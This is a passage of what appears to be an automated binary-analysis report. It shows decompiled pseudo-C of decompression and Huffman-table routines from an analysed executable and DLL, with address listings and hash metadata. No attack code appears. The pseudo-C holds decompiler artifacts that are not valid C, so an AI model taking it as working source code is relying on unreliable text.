                                                														 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                														__ebx = __ebx + 8;
                                                														__eflags = __ebx;
                                                													}
                                                													L85:
                                                													__ecx = __edx;
                                                													__ebx = __ebx - __edx;
                                                													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                													 *(0x409340 + __eax * 2) & 0x0000ffff =  *(0x409340 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                                                													__edx =  *(__ebp - 8);
                                                													__ebx = __ebx - __eax;
                                                													__edx =  *(__ebp - 8) + ( *(0x409340 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                                                													__ecx = __eax;
                                                													__eax = __esi[1];
                                                													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                													__ecx = __esi[2];
                                                													__eax = __eax >> 5;
                                                													__edi = __eax >> 0x00000005 & 0x0000001f;
                                                													__eax = __eax & 0x0000001f;
                                                													__eax = __edi + __eax + 0x102;
                                                													__edi = __edx + __ecx;
                                                													__eflags = __edx + __ecx - __eax;
                                                													if(__edx + __ecx > __eax) {
                                                														goto L9;
                                                													}
                                                													L86:
                                                													__eflags =  *(__ebp - 0x14) - 0x10;
                                                													if( *(__ebp - 0x14) != 0x10) {
                                                														L89:
                                                														__edi = 0;
                                                														__eflags = 0;
                                                														L90:
                                                														__eax = __esi + 0xc + __ecx * 4;
                                                														do {
                                                															L91:
                                                															 *__eax = __edi;
                                                															__ecx = __ecx + 1;
                                                															__eax = __eax + 4;
                                                															__edx = __edx - 1;
                                                															__eflags = __edx;
                                                														} while (__edx != 0);
                                                														__esi[2] = __ecx;
                                                														continue;
                                                													}
                                                													L87:
                                                													__eflags = __ecx - 1;
                                                													if(__ecx < 1) {
                                                														goto L9;
                                                													}
                                                													L88:
                                                													__edi =  *(__esi + 8 + __ecx * 4);
                                                													goto L90;
                                                												}
                                                												L78:
                                                												__ecx = __edx;
                                                												__ebx = __ebx - __edx;
                                                												 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                												__ecx = __esi[2];
                                                												 *(__esi + 0xc + __esi[2] * 4) = __eax;
                                                												__esi[2] = __esi[2] + 1;
                                                											}
                                                											L94:
                                                											__eax = __esi[1];
                                                											__esi[0x144] = __esi[0x144] & 0x00000000;
                                                											 *(__ebp - 0xc) =  *(__ebp - 0xc) & 0x00000000;
                                                											__edi = __eax;
                                                											__eax = __eax >> 5;
                                                											__edi = __edi & 0x0000001f;
                                                											__ecx = 0x101;
                                                											__eax = __eax & 0x0000001f;
                                                											__edi = __edi + 0x101;
                                                											__eax = __eax + 1;
                                                											__edx = __ebp - 0xc;
                                                											 *(__ebp - 0x14) = __eax;
                                                											 &(__esi[0x148]) = __ebp - 4;
                                                											 *(__ebp - 4) = 9;
                                                											__ebp - 0x18 =  &(__esi[3]);
                                                											 *(__ebp - 0x10) = 6;
                                                											__eax = E0040681A( &(__esi[3]), __edi, 0x101, 0x407388, 0x4073c8, __ebp - 0x18, __ebp - 4,  &(__esi[0x148]), __ebp - 0xc);
                                                											__eflags =  *(__ebp - 4);
                                                											if( *(__ebp - 4) == 0) {
                                                												__eax = __eax | 0xffffffff;
                                                												__eflags = __eax;
                                                											}
                                                											__eflags = __eax;
                                                											if(__eax != 0) {
                                                												goto L9;
                                                											} else {
                                                												L97:
                                                												__ebp - 0xc =  &(__esi[0x148]);
                                                												__ebp - 0x10 = __ebp - 0x1c;
                                                												__eax = __esi + 0xc + __edi * 4;
                                                												__eax = E0040681A(__esi + 0xc + __edi * 4,  *(__ebp - 0x14), 0, 0x407408, 0x407444, __ebp - 0x1c, __ebp - 0x10,  &(__esi[0x148]), __ebp - 0xc);
                                                												__eflags = __eax;
                                                												if(__eax != 0) {
                                                													goto L9;
                                                												}
                                                												L98:
                                                												__eax =  *(__ebp - 0x10);
                                                												__eflags =  *(__ebp - 0x10);
                                                												if( *(__ebp - 0x10) != 0) {
                                                													L100:
                                                													__cl =  *(__ebp - 4);
                                                													 *__esi =  *__esi & 0x00000000;
                                                													__eflags =  *__esi;
                                                													__esi[4] = __al;
                                                													__eax =  *(__ebp - 0x18);
                                                													__esi[5] =  *(__ebp - 0x18);
                                                													__eax =  *(__ebp - 0x1c);
                                                													__esi[4] = __cl;
                                                													__esi[6] =  *(__ebp - 0x1c);
                                                													goto L101;
                                                												}
                                                												L99:
                                                												__eflags = __edi - 0x101;
                                                												if(__edi > 0x101) {
                                                													goto L9;
                                                												}
                                                												goto L100;
                                                											}
                                                										case 0xe:
                                                											goto L9;
                                                										case 0xf:
                                                											L175:
                                                											__eax =  *(__ebp - 0x30);
                                                											__esi[0x26ea] =  *(__ebp - 0x30);
                                                											__eax = E004067B2( *((intOrPtr*)(__ebp + 8)));
                                                											__ecx = __esi[0x26ea];
                                                											__edx = __esi[0x26e9];
                                                											__eflags = __ecx - __edx;
                                                											 *(__ebp - 0x30) = __ecx;
                                                											if(__ecx >= __edx) {
                                                												__eax = __esi[0x26e8];
                                                												__eax = __esi[0x26e8] - __ecx;
                                                												__eflags = __eax;
                                                											} else {
                                                												__edx = __edx - __ecx;
                                                												__eax = __edx - __ecx - 1;
                                                											}
                                                											__eflags = __ecx - __edx;
                                                											 *(__ebp - 0x2c) = __eax;
                                                											if(__ecx != __edx) {
                                                												L183:
                                                												__edi = 0;
                                                												goto L10;
                                                											} else {
                                                												L179:
                                                												__eax = __esi[0x145];
                                                												__eflags = __eax - 8;
                                                												 *__esi = __eax;
                                                												if(__eax != 8) {
                                                													L184:
                                                													0 = 1;
                                                													goto L10;
                                                												}
                                                												goto L180;
                                                											}
                                                									}
                                                								}
                                                								L181:
                                                								goto L9;
                                                							}
                                                							L70:
                                                							if( *__edi == __eax) {
                                                								goto L72;
                                                							}
                                                							L71:
                                                							__esi[2] = __esi[2] & __eax;
                                                							 *__esi = 0xd;
                                                							goto L93;
                                                						}
                                                					}
                                                				}
                                                				L182:
                                                				_t443 = 0;
                                                				_t446[0x147] =  *(_t448 - 0x40);
                                                				_t446[0x146] = _t425;
                                                				( *(_t448 + 8))[1] = 0;
                                                				goto L11;
                                                			}









                                                0x0040610a
                                                0x00406111
                                                0x00406116
                                                0x00406116
                                                0x00406116
                                                0x0040611f
                                                0x0040611f
                                                0x00406122
                                                0x00406130
                                                0x00406136
                                                0x0040613b
                                                0x00406141
                                                0x00406147
                                                0x0040614d
                                                0x00406154
                                                0x00406168
                                                0x00406168
                                                0x00406737
                                                0x00406737
                                                0x00406737
                                                0x0040673c
                                                0x00000000
                                                0x00000000
                                                0x00405d74
                                                0x00405d74
                                                0x00000000
                                                0x0040636f
                                                0x0040636f
                                                0x00406373
                                                0x00406376
                                                0x00406379
                                                0x0040637c
                                                0x00000000
                                                0x00000000
                                                0x00406382
                                                0x00406382
                                                0x004063a7
                                                0x004063a7
                                                0x004063a7
                                                0x004063a9
                                                0x00000000
                                                0x00000000
                                                0x00406387
                                                0x00406387
                                                0x0040638b
                                                0x00000000
                                                0x00000000
                                                0x00406391
                                                0x00406391
                                                0x00406394
                                                0x00406397
                                                0x0040639a
                                                0x0040639c
                                                0x0040639e
                                                0x004063a1
                                                0x004063a4
                                                0x004063a4
                                                0x004063a4
                                                0x004063ab
                                                0x004063ab
                                                0x004063b3
                                                0x004063b6
                                                0x004063b9
                                                0x004063bc
                                                0x004063c0
                                                0x004063c3
                                                0x004063c5
                                                0x004063c8
                                                0x004063ca
                                                0x004063de
                                                0x004063de
                                                0x004063e1
                                                0x004063fb
                                                0x004063fb
                                                0x004063fe
                                                0x00000000
                                                0x00000000
                                                0x00406404
                                                0x00406404
                                                0x00406407
                                                0x00000000
                                                0x00000000
                                                0x0040640d
                                                0x0040640d
                                                0x00000000
                                                0x0040640d
                                                0x004063e3
                                                0x004063e6
                                                0x004063ed
                                                0x004063f0
                                                0x00000000
                                                0x004063f0
                                                0x004063cc
                                                0x004063d0
                                                0x004063d3
                                                0x00000000
                                                0x00000000
                                                0x00406418
                                                0x00406418
                                                0x0040643d
                                                0x0040643d
                                                0x0040643d
                                                0x0040643f
                                                0x00000000
                                                0x00000000
                                                0x0040641d
                                                0x0040641d
                                                0x00406421
                                                0x00000000
                                                0x00000000
                                                0x00406427
                                                0x00406427
                                                0x0040642a
                                                0x0040642d
                                                0x00406430
                                                0x00406432
                                                0x00406434
                                                0x00406437
                                                0x0040643a
                                                0x0040643a
                                                0x0040643a
                                                0x00406441
                                                0x00406449
                                                0x0040644c
                                                0x0040644f
                                                0x00406451
                                                0x00406454
                                                0x00406454
                                                0x00406456
                                                0x0040645a
                                                0x0040645d
                                                0x00406460
                                                0x00406463
                                                0x00000000
                                                0x00000000
                                                0x00406469
                                                0x00406469
                                                0x0040648e
                                                0x0040648e
                                                0x0040648e
                                                0x00406490
                                                0x00000000
                                                0x00000000
                                                0x0040646e
                                                0x0040646e
                                                0x00406472
                                                0x00000000
                                                0x00000000
                                                0x00406478
                                                0x00406478
                                                0x0040647b
                                                0x0040647e
                                                0x00406481
                                                0x00406483
                                                0x00406485
                                                0x00406488
                                                0x0040648b
                                                0x0040648b
                                                0x0040648b
                                                0x00406492
                                                0x00406492
                                                0x0040649a
                                                0x0040649d
                                                0x004064a0
                                                0x004064a3
                                                0x004064a7
                                                0x004064aa
                                                0x004064ac
                                                0x004064af
                                                0x004064b2
                                                0x004064cc
                                                0x004064cc
                                                0x004064cf
                                                0x00000000
                                                0x00000000
                                                0x004064d5
                                                0x004064d5
                                                0x004064d8
                                                0x004064df
                                                0x00000000
                                                0x004064df
                                                0x004064b4
                                                0x004064b7
                                                0x004064be
                                                0x004064c1
                                                0x00000000
                                                0x00000000
                                                0x004064e7
                                                0x004064e7
                                                0x0040650c
                                                0x0040650c
                                                0x0040650c
                                                0x0040650e
                                                0x00000000
                                                0x00000000
                                                0x004064ec
                                                0x004064ec
                                                0x004064f0
                                                0x00000000
                                                0x00000000
                                                0x004064f6
                                                0x004064f6
                                                0x004064f9
                                                0x004064fc
                                                0x004064ff
                                                0x00406501
                                                0x00406503
                                                0x00406506
                                                0x00406509
                                                0x00406509
                                                0x00406509
                                                0x00406510
                                                0x00406518
                                                0x0040651b
                                                0x0040651e
                                                0x00406520
                                                0x00406523
                                                0x00406523
                                                0x00406525
                                                0x00000000
                                                0x00000000
                                                0x0040652b
                                                0x0040652b
                                                0x0040652e
                                                0x00406533
                                                0x00406535
                                                0x0040653b
                                                0x0040653d
                                                0x00406552
                                                0x00406554
                                                0x00406554
                                                0x0040653f
                                                0x00406545
                                                0x00406547
                                                0x00406549
                                                0x00406549
                                                0x00406556
                                                0x0040655a
                                                0x0040655d
                                                0x00406563
                                                0x00406563
                                                0x00406566
                                                0x00406566
                                                0x00406566
                                                0x00406568
                                                0x00000000
                                                0x00000000
                                                0x0040656e
                                                0x0040656e
                                                0x00406574
                                                0x00406576
                                                0x0040659b
                                                0x0040659e
                                                0x004065a4
                                                0x004065a9
                                                0x004065af
                                                0x004065b5
                                                0x004065b7
                                                0x004065ba
                                                0x004065c3
                                                0x004065c9
                                                0x004065c9
                                                0x004065bc
                                                0x004065be
                                                0x004065c0
                                                0x004065c0
                                                0x004065cb
                                                0x004065d1
                                                0x004065d3
                                                0x004065d6
                                                0x004065d8
                                                0x004065de
                                                0x004065e0
                                                0x004065e2
                                                0x004065e4
                                                0x004065e6
                                                0x004065e9
                                                0x004065f2
                                                0x004065f5
                                                0x004065f5
                                                0x004065eb
                                                0x004065eb
                                                0x004065ee
                                                0x004065ee
                                                0x004065e9
                                                0x004065e0
                                                0x004065f7
                                                0x004065f9
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004065f9
                                                0x00406578
                                                0x00406578
                                                0x0040657e
                                                0x00406584
                                                0x00406586
                                                0x00000000
                                                0x00000000
                                                0x00406588
                                                0x00406588
                                                0x0040658a
                                                0x0040658c
                                                0x00406595
                                                0x00406595
                                                0x0040658e
                                                0x0040658e
                                                0x00406591
                                                0x00406591
                                                0x00406597
                                                0x00406599
                                                0x00000000
                                                0x00000000
                                                0x004065ff
                                                0x004065ff
                                                0x00406604
                                                0x00406606
                                                0x00406607
                                                0x00406608
                                                0x00406609
                                                0x0040660f
                                                0x00406612
                                                0x00406615
                                                0x00406618
                                                0x0040661a
                                                0x00406620
                                                0x00406620
                                                0x00406623
                                                0x00406623
                                                0x00406623
                                                0x00406623
                                                0x0040662c
                                                0x00000000
                                                0x00000000
                                                0x00406631
                                                0x00406631
                                                0x00406634
                                                0x00406637
                                                0x00406639
                                                0x004066d0
                                                0x004066d0
                                                0x004066d3
                                                0x004066d5
                                                0x004066d6
                                                0x004066d7
                                                0x004066da
                                                0x00000000
                                                0x004066da
                                                0x0040663f
                                                0x0040663f
                                                0x00406645
                                                0x00406647
                                                0x0040666c
                                                0x0040666f
                                                0x00406675
                                                0x0040667a
                                                0x00406680
                                                0x00406686
                                                0x00406688
                                                0x0040668b
                                                0x00406694
                                                0x0040669a
                                                0x0040669a
                                                0x0040668d
                                                0x0040668f
                                                0x00406691
                                                0x00406691
                                                0x0040669c
                                                0x004066a2
                                                0x004066a4
                                                0x004066a7
                                                0x004066a9
                                                0x004066af
                                                0x004066b1
                                                0x004066b3
                                                0x004066b5
                                                0x004066b7
                                                0x004066ba
                                                0x004066c3
                                                0x004066c6
                                                0x004066c6
                                                0x004066bc
                                                0x004066bc
                                                0x004066bf
                                                0x004066bf
                                                0x004066ba
                                                0x004066b1
                                                0x004066c8
                                                0x004066ca
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004066ca
                                                0x00406649
                                                0x00406649
                                                0x0040664f
                                                0x00406655
                                                0x00406657
                                                0x00000000
                                                0x00000000
                                                0x00406659
                                                0x00406659
                                                0x0040665b
                                                0x0040665d
                                                0x00406664
                                                0x00406664
                                                0x00406666
                                                0x0040665f
                                                0x0040665f
                                                0x00406661
                                                0x00406661
                                                0x00406668
                                                0x0040666a
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004066e2
                                                0x004066e2
                                                0x004066e5
                                                0x004066e7
                                                0x004066ea
                                                0x004066ed
                                                0x004066ed
                                                0x004066ed
                                                0x004066ed
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00405d9b
                                                0x00405d7f
                                                0x00000000
                                                0x00405d85
                                                0x00405d88
                                                0x00405d92
                                                0x00405d95
                                                0x00405d98
                                                0x00000000
                                                0x00405d98
                                                0x00405d7f
                                                0x00405da3
                                                0x00405da6
                                                0x00405daa
                                                0x00405db4
                                                0x00405dbe
                                                0x00405dc1
                                                0x00405dc7
                                                0x00405efb
                                                0x00405efd
                                                0x00405f03
                                                0x00405f06
                                                0x00405f09
                                                0x00000000
                                                0x00405f09
                                                0x00405dcd
                                                0x00405dcd
                                                0x00405dce
                                                0x00405e26
                                                0x00405e26
                                                0x00405e2d
                                                0x00405ed3
                                                0x00405ed3
                                                0x00405ed8
                                                0x00405edb
                                                0x00405ee0
                                                0x00405ee3
                                                0x00405ee8
                                                0x00405eeb
                                                0x00405ef0
                                                0x00405ef3
                                                0x00405ef3
                                                0x00000000

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680557844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.680549996.0000000000400000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.680567147.0000000000407000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.680574103.0000000000409000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.680607574.000000000042C000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.680617982.0000000000434000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.680649424.0000000000437000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b4b312f10185920f8a0b96b4abd929aee100b8ba7c7b52d81bf300e1eca2c2a6
                                                • Instruction ID: e2ef9aa76577a7a1e17a70bef0141433c3d77918b2314780ae2ebb94a64f5d95
                                                • Opcode Fuzzy Hash: b4b312f10185920f8a0b96b4abd929aee100b8ba7c7b52d81bf300e1eca2c2a6
                                                • Instruction Fuzzy Hash: D1E17B71900709DFDB28CF58C884BAAB7F5EB44305F15852FE896AB291D378AA51CF14
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.681888530.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.681879647.0000000010000000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.681911714.000000001001A000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.681933338.000000001001F000.00000040.00020000.sdmp
                                                • Associated: 00000000.00000002.681942281.0000000010020000.00000080.00020000.sdmp
                                                • Associated: 00000000.00000002.681951290.0000000010021000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                • Instruction ID: b1c94d1a7de5a8a9b6a80f4a3a0336f1d591be03f135de5321b8fb262f45dd19
                                                • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                • Instruction Fuzzy Hash: DDC152322052970AEB4DC779C47493EBEE1DB926F131B076ED8B3CB5D9EE20C5649620
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.681888530.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.681879647.0000000010000000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.681911714.000000001001A000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.681933338.000000001001F000.00000040.00020000.sdmp
                                                • Associated: 00000000.00000002.681942281.0000000010020000.00000080.00020000.sdmp
                                                • Associated: 00000000.00000002.681951290.0000000010021000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                • Instruction ID: 56eba0105f7ef240fa449d18eaa978ca8592043a306515ee4523643c35df4af1
                                                • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                • Instruction Fuzzy Hash: 08C150322052970AEB4DC779C47583EBEE1DB926F131B176ED8B3CB5D8EE20D5249620
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E0040681A(signed char _a4, char _a5, short _a6, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24, signed int _a28, intOrPtr _a32, signed int* _a36) {
                                                				signed int _v8;
                                                				unsigned int _v12;
                                                				signed int _v16;
                                                				intOrPtr _v20;
                                                				signed int _v24;
                                                				signed int _v28;
                                                				intOrPtr* _v32;
                                                				signed int* _v36;
                                                				signed int _v40;
                                                				signed int _v44;
                                                				intOrPtr _v48;
                                                				intOrPtr _v52;
                                                				void _v116;
                                                				signed int _v176;
                                                				signed int _v180;
                                                				signed int _v240;
                                                				signed int _t166;
                                                				signed int _t168;
                                                				intOrPtr _t175;
                                                				signed int _t181;
                                                				void* _t182;
                                                				intOrPtr _t183;
                                                				signed int* _t184;
                                                				signed int _t186;
                                                				signed int _t187;
                                                				signed int* _t189;
                                                				signed int _t190;
                                                				intOrPtr* _t191;
                                                				intOrPtr _t192;
                                                				signed int _t193;
                                                				signed int _t195;
                                                				signed int _t200;
                                                				signed int _t205;
                                                				void* _t207;
                                                				short _t208;
                                                				signed char _t222;
                                                				signed int _t224;
                                                				signed int _t225;
                                                				signed int* _t232;
                                                				signed int _t233;
                                                				signed int _t234;
                                                				void* _t235;
                                                				signed int _t236;
                                                				signed int _t244;
                                                				signed int _t246;
                                                				signed int _t251;
                                                				signed int _t254;
                                                				signed int _t256;
                                                				signed int _t259;
                                                				signed int _t262;
                                                				void* _t263;
                                                				void* _t264;
                                                				signed int _t267;
                                                				intOrPtr _t269;
                                                				intOrPtr _t271;
                                                				signed int _t274;
                                                				intOrPtr* _t275;
                                                				unsigned int _t276;
                                                				void* _t277;
                                                				signed int _t278;
                                                				intOrPtr* _t279;
                                                				signed int _t281;
                                                				intOrPtr _t282;
                                                				intOrPtr _t283;
                                                				signed int* _t284;
                                                				signed int _t286;
                                                				signed int _t287;
                                                				signed int _t288;
                                                				signed int _t296;
                                                				signed int* _t297;
                                                				intOrPtr _t298;
                                                				void* _t299;
                                                
                                                				_t278 = _a8;
                                                				_t187 = 0x10;
                                                				memset( &_v116, 0, _t187 << 2);
                                                				_t189 = _a4;
                                                				_t233 = _t278;
                                                				do {
                                                					_t166 =  *_t189;
                                                					_t189 =  &(_t189[1]);
                                                					 *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) =  *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) + 1;
                                                					_t233 = _t233 - 1;
                                                				} while (_t233 != 0);
                                                				if(_v116 != _t278) {
                                                					_t279 = _a28;
                                                					_t267 =  *_t279;
                                                					_t190 = 1;
                                                					_a28 = _t267;
                                                					_t234 = 0xf;
                                                					while(1) {
                                                						_t168 = 0;
                                                						if( *((intOrPtr*)(_t299 + _t190 * 4 - 0x70)) != 0) {
                                                							break;
                                                						}
                                                						_t190 = _t190 + 1;
                                                						if(_t190 <= _t234) {
                                                							continue;
                                                						}
                                                						break;
                                                					}
                                                					_v8 = _t190;
                                                					if(_t267 < _t190) {
                                                						_a28 = _t190;
                                                					}
                                                					while( *((intOrPtr*)(_t299 + _t234 * 4 - 0x70)) == _t168) {
                                                						_t234 = _t234 - 1;
                                                						if(_t234 != 0) {
                                                							continue;
                                                						}
                                                						break;
                                                					}
                                                					_v28 = _t234;
                                                					if(_a28 > _t234) {
                                                						_a28 = _t234;
                                                					}
                                                					 *_t279 = _a28;
                                                					_t181 = 1 << _t190;
                                                					while(_t190 < _t234) {
                                                						_t182 = _t181 -  *((intOrPtr*)(_t299 + _t190 * 4 - 0x70));
                                                						if(_t182 < 0) {
                                                							L64:
                                                							return _t168 | 0xffffffff;
                                                						}
                                                						_t190 = _t190 + 1;
                                                						_t181 = _t182 + _t182;
                                                					}
                                                					_t281 = _t234 << 2;
                                                					_t191 = _t299 + _t281 - 0x70;
                                                					_t269 =  *_t191;
                                                					_t183 = _t181 - _t269;
                                                					_v52 = _t183;
                                                					if(_t183 < 0) {
                                                						goto L64;
                                                					}
                                                					_v176 = _t168;
                                                					 *_t191 = _t269 + _t183;
                                                					_t192 = 0;
                                                					_t235 = _t234 - 1;
                                                					if(_t235 == 0) {
                                                						L21:
                                                						_t184 = _a4;
                                                						_t271 = 0;
                                                						do {
                                                							_t193 =  *_t184;
                                                							_t184 =  &(_t184[1]);
                                                							if(_t193 != _t168) {
                                                								_t232 = _t299 + _t193 * 4 - 0xb0;
                                                								_t236 =  *_t232;
                                                								 *((intOrPtr*)(0x42cdf0 + _t236 * 4)) = _t271;
                                                								 *_t232 = _t236 + 1;
                                                							}
                                                							_t271 = _t271 + 1;
                                                						} while (_t271 < _a8);
                                                						_v16 = _v16 | 0xffffffff;
                                                						_v40 = _v40 & 0x00000000;
                                                						_a8 =  *((intOrPtr*)(_t299 + _t281 - 0xb0));
                                                						_t195 = _v8;
                                                						_t186 =  ~_a28;
                                                						_v12 = _t168;
                                                						_v180 = _t168;
                                                						_v36 = 0x42cdf0;
                                                						_v240 = _t168;
                                                						if(_t195 > _v28) {
                                                							L62:
                                                							_t168 = 0;
                                                							if(_v52 == 0 || _v28 == 1) {
                                                								return _t168;
                                                							} else {
                                                								goto L64;
                                                							}
                                                						}
                                                						_v44 = _t195 - 1;
                                                						_v32 = _t299 + _t195 * 4 - 0x70;
                                                						do {
                                                							_t282 =  *_v32;
                                                							if(_t282 == 0) {
                                                								goto L61;
                                                							}
                                                							while(1) {
                                                								_t283 = _t282 - 1;
                                                								_t200 = _a28 + _t186;
                                                								_v48 = _t283;
                                                								_v24 = _t200;
                                                								if(_v8 <= _t200) {
                                                									goto L45;
                                                								}
                                                								L31:
                                                								_v20 = _t283 + 1;
                                                								do {
                                                									_v16 = _v16 + 1;
                                                									_t296 = _v28 - _v24;
                                                									if(_t296 > _a28) {
                                                										_t296 = _a28;
                                                									}
                                                									_t222 = _v8 - _v24;
                                                									_t254 = 1 << _t222;
                                                									if(1 <= _v20) {
                                                										L40:
                                                										_t256 =  *_a36;
                                                										_t168 = 1 << _t222;
                                                										_v40 = 1;
                                                										_t274 = _t256 + 1;
                                                										if(_t274 > 0x5a0) {
                                                											goto L64;
                                                										}
                                                									} else {
                                                										_t275 = _v32;
                                                										_t263 = _t254 + (_t168 | 0xffffffff) - _v48;
                                                										if(_t222 >= _t296) {
                                                											goto L40;
                                                										}
                                                										while(1) {
                                                											_t222 = _t222 + 1;
                                                											if(_t222 >= _t296) {
                                                												goto L40;
                                                											}
                                                											_t275 = _t275 + 4;
                                                											_t264 = _t263 + _t263;
                                                											_t175 =  *_t275;
                                                											if(_t264 <= _t175) {
                                                												goto L40;
                                                											}
                                                											_t263 = _t264 - _t175;
                                                										}
                                                										goto L40;
                                                									}
                                                									_t168 = _a32 + _t256 * 4;
                                                									_t297 = _t299 + _v16 * 4 - 0xec;
                                                									 *_a36 = _t274;
                                                									_t259 = _v16;
                                                									 *_t297 = _t168;
                                                									if(_t259 == 0) {
                                                										 *_a24 = _t168;
                                                									} else {
                                                										_t276 = _v12;
                                                										_t298 =  *((intOrPtr*)(_t297 - 4));
                                                										 *(_t299 + _t259 * 4 - 0xb0) = _t276;
                                                										_a5 = _a28;
                                                										_a4 = _t222;
                                                										_t262 = _t276 >> _t186;
                                                										_a6 = (_t168 - _t298 >> 2) - _t262;
                                                										 *(_t298 + _t262 * 4) = _a4;
                                                									}
                                                									_t224 = _v24;
                                                									_t186 = _t224;
                                                									_t225 = _t224 + _a28;
                                                									_v24 = _t225;
                                                								} while (_v8 > _t225);
                                                								L45:
                                                								_t284 = _v36;
                                                								_a5 = _v8 - _t186;
                                                								if(_t284 < 0x42cdf0 + _a8 * 4) {
                                                									_t205 =  *_t284;
                                                									if(_t205 >= _a12) {
                                                										_t207 = _t205 - _a12 + _t205 - _a12;
                                                										_v36 =  &(_v36[1]);
                                                										_a4 =  *((intOrPtr*)(_t207 + _a20)) + 0x50;
                                                										_t208 =  *((intOrPtr*)(_t207 + _a16));
                                                									} else {
                                                										_a4 = (_t205 & 0xffffff00 | _t205 - 0x00000100 > 0x00000000) - 0x00000001 & 0x00000060;
                                                										_t208 =  *_t284;
                                                										_v36 =  &(_t284[1]);
                                                									}
                                                									_a6 = _t208;
                                                								} else {
                                                									_a4 = 0xc0;
                                                								}
                                                								_t286 = 1 << _v8 - _t186;
                                                								_t244 = _v12 >> _t186;
                                                								while(_t244 < _v40) {
                                                									 *(_t168 + _t244 * 4) = _a4;
                                                									_t244 = _t244 + _t286;
                                                								}
                                                								_t287 = _v12;
                                                								_t246 = 1 << _v44;
                                                								while((_t287 & _t246) != 0) {
                                                									_t287 = _t287 ^ _t246;
                                                									_t246 = _t246 >> 1;
                                                								}
                                                								_t288 = _t287 ^ _t246;
                                                								_v20 = 1;
                                                								_v12 = _t288;
                                                								_t251 = _v16;
                                                								if(((1 << _t186) - 0x00000001 & _t288) ==  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0))) {
                                                									L60:
                                                									if(_v48 != 0) {
                                                										_t282 = _v48;
                                                										_t283 = _t282 - 1;
                                                										_t200 = _a28 + _t186;
                                                										_v48 = _t283;
                                                										_v24 = _t200;
                                                										if(_v8 <= _t200) {
                                                											goto L45;
                                                										}
                                                										goto L31;
                                                									}
                                                									break;
                                                								} else {
                                                									goto L58;
                                                								}
                                                								do {
                                                									L58:
                                                									_t186 = _t186 - _a28;
                                                									_t251 = _t251 - 1;
                                                								} while (((1 << _t186) - 0x00000001 & _v12) !=  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0)));
                                                								_v16 = _t251;
                                                								goto L60;
                                                							}
                                                							L61:
                                                							_v8 = _v8 + 1;
                                                							_v32 = _v32 + 4;
                                                							_v44 = _v44 + 1;
                                                						} while (_v8 <= _v28);
                                                						goto L62;
                                                					}
                                                					_t277 = 0;
                                                					do {
                                                						_t192 = _t192 +  *((intOrPtr*)(_t299 + _t277 - 0x6c));
                                                						_t277 = _t277 + 4;
                                                						_t235 = _t235 - 1;
                                                						 *((intOrPtr*)(_t299 + _t277 - 0xac)) = _t192;
                                                					} while (_t235 != 0);
                                                					goto L21;
                                                				}
                                                				 *_a24 =  *_a24 & 0x00000000;
                                                				 *_a28 =  *_a28 & 0x00000000;
                                                				return 0;
                                                			}

                                                0x00406a7f
                                                0x00406a82
                                                0x00406a88
                                                0x00406a88
                                                0x00406aa9
                                                0x00406a64
                                                0x00406a64
                                                0x00406a64
                                                0x00406aba
                                                0x00406abe
                                                0x00406aca
                                                0x00406ac5
                                                0x00406ac8
                                                0x00406ac8
                                                0x00406ad2
                                                0x00406ad7
                                                0x00406adf
                                                0x00406adb
                                                0x00406add
                                                0x00406add
                                                0x00406ae5
                                                0x00406ae7
                                                0x00406aee
                                                0x00406af8
                                                0x00406b02
                                                0x00406b1e
                                                0x00406b22
                                                0x00406967
                                                0x0040696d
                                                0x0040696e
                                                0x00406970
                                                0x00406976
                                                0x00406979
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406979
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406b04
                                                0x00406b04
                                                0x00406b04
